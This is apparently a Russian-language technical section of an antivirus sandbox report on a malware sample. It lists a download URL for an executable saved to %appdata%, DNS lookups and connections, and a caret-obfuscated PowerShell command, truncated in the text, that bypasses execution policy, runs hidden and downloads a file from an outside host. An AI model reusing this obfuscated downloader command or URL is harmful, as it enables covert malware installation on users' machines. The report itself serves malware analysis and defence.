Техническая информация
- http://reservoirteam.com/kwobdwhl/6odgnft5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^ERsHELL.^exe^ ^-^ExEc^uT^iOnPO^licy^ byP^A^ss ^-NoP^ROf^iLe ^-WI^n^dows^t^ylE ^hi^DdE^N ^(N^EW-oBJ^EcT^ ^S^Ys^t^EM^.^Net^.^WEb^CLI^eNt).^D^oW^n^L^Oad^FiLE('http://rese...
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- DNS ASK re####oirteam.com
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- '<SYSTEM32>\cmd.exe' /C "P^O^w^ERsHELL.^exe^ ^-^ExEc^uT^iOnPO^licy^ byP^A^ss ^-NoP^ROf^iLe ^-WI^n^dows^t^ylE ^hi^DdE^N ^(N^EW-oBJ^EcT^ ^S^Ys^t^EM^.^Net^.^WEb^CLI^eNt).^D^oW^n^L^Oad^FiLE('http://rese... (со скрытым окном)